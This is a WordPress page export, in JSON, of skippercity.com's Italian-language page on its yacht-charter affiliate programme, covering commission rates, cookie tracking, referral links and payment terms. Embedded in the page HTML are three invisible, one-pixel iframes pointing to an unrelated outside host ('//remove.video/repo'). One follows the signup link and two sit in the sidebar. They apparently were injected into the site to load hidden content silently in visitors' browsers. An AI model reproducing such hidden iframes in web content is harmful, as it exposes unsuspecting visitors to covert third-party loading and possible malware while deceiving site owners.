{"id":412116,"date":"2024-01-15T12:32:29","date_gmt":"2024-01-15T12:32:29","guid":{"rendered":"https:\/\/www.skippercity.com\/programma-di-affiliazione-per-il-noleggio-di-barche\/"},"modified":"2024-02-21T11:19:50","modified_gmt":"2024-02-21T11:19:50","slug":"programma-di-affiliazione-per-il-noleggio-di-barche","status":"publish","type":"page","link":"https:\/\/skippercity.com\/it\/programma-di-affiliazione-per-il-noleggio-di-barche\/","title":{"rendered":"Programma di affiliazione per il noleggio di barche"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"412116\" class=\"elementor elementor-412116 elementor-412040\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1250e588 elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1250e588\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9f1c76f\" data-id=\"9f1c76f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a4f0833 elementor-widget elementor-widget-heading\" data-id=\"4a4f0833\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Programma di affiliazione per il noleggio di barche<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4eaa1748 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4eaa1748\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-25087f4b\" data-id=\"25087f4b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-571c4982\" data-id=\"571c4982\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-66f25697\" data-id=\"66f25697\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4518a569 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4518a569\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-4a55adf6\" data-id=\"4a55adf6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-225b732b elementor-widget elementor-widget-text-editor\" data-id=\"225b732b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\"><strong>Fatti rapidi:<\/strong><\/span><\/p>\n<ul>\n<li>Il programma di affiliazione pi\u00f9 pagato<\/li>\n<li>20-25% dalla nostra commissione sul noleggio delle barche<\/li>\n<li>Commissioni a vita<\/li>\n<li>365 giorni di scadenza dei cookie<\/li>\n<\/ul>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c35e15 elementor-widget elementor-widget-table-of-contents\" data-id=\"16c35e15\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;Non sono state trovate intestazioni in questa pagina.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\tTabella dei contenuti\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__16c35e15\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70ed3a7f\" data-id=\"70ed3a7f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4c5b7b5f elementor-widget elementor-widget-text-editor\" data-id=\"4c5b7b5f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Programma di affiliazione per il noleggio di barche<\/h2>\n<p>Se avete un sito web con clienti interessati al noleggio di yacht &#8211; barche a vela, caicchi, yacht a motore, superyacht &#8211; in qualsiasi parte del mondo, saremmo interessati a collaborare con voi per una partnership di affiliazione.<\/p>\n<p><u><b>Amiamo i partner!<\/b><\/u><\/p>\n<p>Il programma di affiliazione Yachtco vi consente di iniziare a guadagnare con il noleggio di yacht semplicemente aggiungendo un link dal vostro sito al nostro.<\/p>\n<h2>Come funziona?<\/h2>\n<p>Quando un cliente <strong>clicca sul vostro link sul vostro sito web<\/strong> (o blog o social media), finisce sul nostro sito e poi noleggia un&#8217;imbarcazione tramite noi, una percentuale della commissione vi viene accreditata secondo i nostri termini e condizioni. Tutto \u00e8 monitorato (elettronicamente e offline) e noi controlliamo lo stato dei lead per voi.<\/p>\n<p>Il <strong>broker (cio\u00e8 noi) guadagna una commissione<\/strong> sul valore netto del noleggio di una prenotazione di imbarcazioni (senza includere l&#8217;APA o eventuali articoli o servizi aggiuntivi ordinati). Questa commissione dipende dalla localit\u00e0, dal tipo di barca e dalle commissioni del settore. L <strong>&#8216;affiliato (cio\u00e8 voi) guadagner\u00e0 il 20%-25%<\/strong> come percentuale di base per questa commissione guadagnata dal broker.<\/p>\n<p><b>Skippercity \u00e8 orgogliosa di seguire fedelmente tutti i clienti charter, e per questo gli affiliati sono compensati guadagnando il 20%-25% della nostra commissione su tutte le prenotazioni dei clienti che ritornano da noi.<\/b><\/p>\n<p>Il nostro sistema tiene traccia dei clienti che hanno precedentemente richiesto informazioni a un affiliato o prenotato da un affiliato, in modo da poter sempre restituire le commissioni all&#8217;affiliato. Skippercity rispetter\u00e0 l&#8217;introduzione e offrir\u00e0 agli affiliati un compenso per l&#8217;introduzione se il cliente torna a Skippercity al di fuori del programma di affiliazione (cio\u00e8 senza cookie) per onorare il link che ci ha fornito, in quanto \u00e8 arrivato a noi in precedenza avendo chiesto informazioni tramite un affiliato.<\/p>\n<p>3.000 EUR \u00e8 il valore netto medio del noleggio per iniziare a ricevere la commissione. Si applicano i nostri termini e condizioni.<\/p>\n<p>Abbiamo modi di indagine, immagini eleganti e pulsanti per voi. Questi sono tutti disponibili nella vostra &#8220;dashboard&#8221; di affiliato, quindi tutto ci\u00f2 che dovete fare \u00e8 copiare e incollare il codice nel vostro sito web, e siete tutti pronti a partire!<\/p>\n<p>Il vostro URL per gli affiliati sar\u00e0 https:\/\/skippercity.com\/?ref=username. \u00c8 sufficiente installare il codice (?ref=?ref=username) alla fine di qualsiasi link a Skippercity, e tutto viene monitorato da l\u00ec!<\/p>\n<p><a href=\"https:\/\/skippercity.com\/it\/diventa-nostro-affiliato\/\">Se siete interessati a iscrivervi al nostro programma di affiliazione, fate clic qui per iscri<\/a> vervi e noi elaboreremo la vostra richiesta di adesione al programma.<\/p>\n<p>Tutti i contenuti del sito SkipperCity sono protetti da copyright. Non incoraggiamo i nostri affiliati a utilizzare qualsiasi contenuto di https:\/\/skippercity.com e a copiare o duplicare il materiale sul proprio sito web come proprio in qualche modo. Ma siete invitati a creare i vostri contenuti e a collegarvi a noi.<\/p>\n<h2>Come tracciamo le vendite<\/h2>\n<p>Tutti i clienti provenienti dal vostro sito saranno &#8220;cookizzati&#8221; e il vostro account sar\u00e0 collegato ai cookie. Quando un cliente ci invia una richiesta o crea un account con noi, facciamo quello che sappiamo fare meglio: raccomandare la barca giusta, organizzare il contratto e i pagamenti e far salire a bordo il cliente.<\/p>\n<p>Se il cliente che noleggia uno yacht proviene dal vostro sito web, condivideremo con voi una parte della commissione.<\/p>\n<h2>Come si viene pagati?<\/h2>\n<p>Paghiamo i nostri affiliati tramite bonifico bancario o tramite Stripe.<\/p>\n<p>Gli affiliati saranno pagati un mese dopo il completamento soddisfacente del charter: questa \u00e8 la norma del settore per tutte le parti interessate. Tutti i partecipanti vengono pagati al termine del charter, perch\u00e9 se ci sono problemi durante il charter, vogliamo assicurarci che i broker, gli yacht manager, gli skipper e i proprietari li risolvano prima che i clienti sbarchino dallo yacht.<\/p>\n<p>Per tutti i charter annullati (da clienti o proprietari), gli affiliati, gli agenti di viaggio e tutti i referral non sono considerati alcuna commissione.<\/p>\n<h2>Come iscriversi al programma di affiliazione<\/h2>\n<p>Per candidarsi al programma di affiliazione \u00e8 necessario avere un sito web, un blog o un social network esistente con una base di clienti complementare al noleggio di yacht (viaggi, prodotti di lusso, servizi di concierge, ecc.).<\/p>\n<p>Non avete alcun rischio o spesa per il programma di affiliazione. Tutto ci\u00f2 che dovete fare \u00e8 <a href=\"https:\/\/skippercity.com\/it\/diventa-nostro-affiliato\/\">compilare il nostro modulo online.<\/a><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74185aa8 elementor-align-justify elementor-widget elementor-widget-button\" data-id=\"74185aa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/skippercity.com\/it\/diventa-nostro-affiliato\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Iscriviti al nostro programma di affiliazione per il noleggio di barche<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-1b9e4a7d\" data-id=\"1b9e4a7d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c060e83 elementor-widget elementor-widget-text-editor\" data-id=\"7c060e83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\">Collegamenti rapidi:<\/span><\/p>\n<ul>\n<li><a href=\"https:\/\/skippercity.com\/it\/diventa-nostro-affiliato\/\">Registrazione\/iscrizione<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/it\/accesso-affiliato\/\">Accesso<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/it\/il-mio-account-2\/\">Il vostro conto affiliato<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Programma di affiliazione per il noleggio di barche Fatti rapidi: Il programma di affiliazione pi\u00f9 pagato 20-25% dalla nostra commissione sul noleggio delle barche Commissioni a vita 365 giorni di scadenza dei cookie Tabella dei contenuti Programma di affiliazione per il noleggio di barche Se avete un sito web con clienti interessati al noleggio di [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-412116","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/it\/wp-json\/wp\/v2\/pages\/412116","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/it\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/it\/wp-json\/wp\/v2\/comments?post=412116"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/it\/wp-json\/wp\/v2\/pages\/412116\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/it\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/it\/wp-json\/wp\/v2\/media?parent=412116"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}